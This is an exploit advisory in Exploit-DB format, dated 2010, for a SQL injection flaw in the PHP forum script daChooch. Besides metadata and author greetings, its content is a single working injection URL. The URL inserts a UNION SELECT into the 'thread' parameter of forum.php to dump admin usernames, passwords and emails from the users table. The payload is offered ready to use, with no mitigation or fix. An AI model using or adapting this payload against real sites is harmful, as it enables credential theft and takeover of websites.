daChooch - SQL Injection

EDB-ID:

11425

CVE:

N/A


Author:

snakespc

Type:

webapps


Platform:

PHP

Date:

2010-02-12


==============================================================================
[»] Dachooch Remote Sql Injection Vulnerability
==============================================================================
  
[»] Script:   [dachooch ]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Note:     [ Hna Rana Fi South Africa (Coupe du monde)  ]
  
###########################################################################
 ===[ Exploit ]=== 
  
[»] http://server/forum.php?mid=3&smid=0&group=3&thread=-3+UNION all SELECT 1,2,unhex(hex(group_concat(admin,0x3a,pass,0x3a,email))),CHAR(115, 101, 99, 45, 119, 97, 114),5,6+from+users--
[»]Author: Snakespc <-
###########################################################################